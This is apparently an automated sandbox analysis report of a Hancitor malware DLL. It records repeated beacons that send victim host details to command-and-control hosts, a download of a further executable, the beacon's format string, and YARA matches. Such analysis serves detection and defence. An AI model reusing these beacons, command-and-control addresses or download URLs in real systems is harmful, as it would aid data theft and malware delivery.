                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E51FE0 GetNextDlgTabItem,InternetCrackUrlA,CharPrevA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: unknownDNS traffic detected: queries for: api.ipify.org
                  Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: rundll32.exe, 00000003.00000003.457697486.0000000003046000.00000004.00000001.sdmpString found in binary or memory: http://anspossthrly.ru/8/forum.php
                  Source: rundll32.exeString found in binary or memory: http://api.ipify.org
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpString found in binary or memory: http://api.ipify.org/
                  Source: rundll32.exe, 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
                  Source: rundll32.exe, 00000003.00000003.457697486.0000000003046000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.447086545.000000000306B000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php
                  Source: rundll32.exe, 00000003.00000003.460449950.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php&
                  Source: rundll32.exe, 00000003.00000003.459490879.000000000304A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php.com/8/forum.php
                  Source: rundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php.com/8/forum.phpeBH
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php2
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php6O
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php8
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php:
                  Source: rundll32.exe, 00000003.00000002.488661456.000000000306C000.00000004.00000020.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php=
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpK
                  Source: rundll32.exe, 00000003.00000003.449636554.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpT
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpb
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpeBH
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpea
                  Source: rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phph
                  Source: rundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.488695100.0000000003074000.00000004.00000020.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpk
                  Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phponnection:
                  Source: rundll32.exe, 00000003.00000003.468221370.000000000306B000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpp
                  Source: rundll32.exe, 00000003.00000003.470696238.0000000003076000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phppR
                  Source: rundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phpq
                  Source: rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpString found in binary or memory: http://sudepallon.com/8/forum.phps
                  Source: rundll32.exe, 00000003.00000003.370674723.000000000306B000.00000004.00000001.sdmpString found in binary or memory: http://sudepallon.com/fjsdfjks.exe
                  Source: rundll32.exe, 00000003.00000003.457697486.0000000003046000.00000004.00000001.sdmpString found in binary or memory: http://thentabecon.ru/8/forum.php
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E8E556 VirtualAlloc,VirtualAlloc,VirtualAlloc,IsWindowEnabled,FlsFree,FlsFree,VirtualProtect,VirtualProtect,GetAsyncKeyState,GetProcAddress,LoadLibraryExA,VirtualProtect,InitDManipHook,VirtualProtect,VirtualFree,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E787F7 CreateDesktopExW,_strlen,SetRect,

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004293B0: GetFileInformationByHandle,DeviceIoControl,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E61E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E71B95
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7BB0E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E5F0C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E72068
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E72848
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6B1F0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7A1C3
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6F92D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6FF50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7A705
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E79C81
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E72C68
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7547B
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7243C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040E85F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00415800
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040F9C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004122DD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004220F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00425141
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042D972
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042F101
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004261C4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004221DF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00430268
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040727F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042FA0C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040B2F3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042FB2C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00432BF4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040A3A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042F445
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00420408
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00430C08
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004314CB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00409CE5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042E4B7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042057D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00414506
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00406D10
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00430523
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042DDCA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00409DD8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042FE02
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00430E22
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00432E3A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042E6E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042EEA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040A71A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042EFC5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BFEF
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04441E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04452C68
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445547B
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445243C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04459C81
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444FF50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445A705
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04452848
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04452068
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0443F0C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444F92D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445A1C3
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444B1F0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445BB0E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04451B95
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BB1E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC9C81
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC243C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC547B
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC2C68
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BCA705
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BBFF50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BAF0C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC2068
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC2848
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BBB1F0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BCA1C3
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BBF92D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC1B95
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BCBB0E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02E6FEF0 appears 51 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0444FEF0 appears 51 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04BBFEF0 appears 51 times
                  Source: niberius.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  Source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
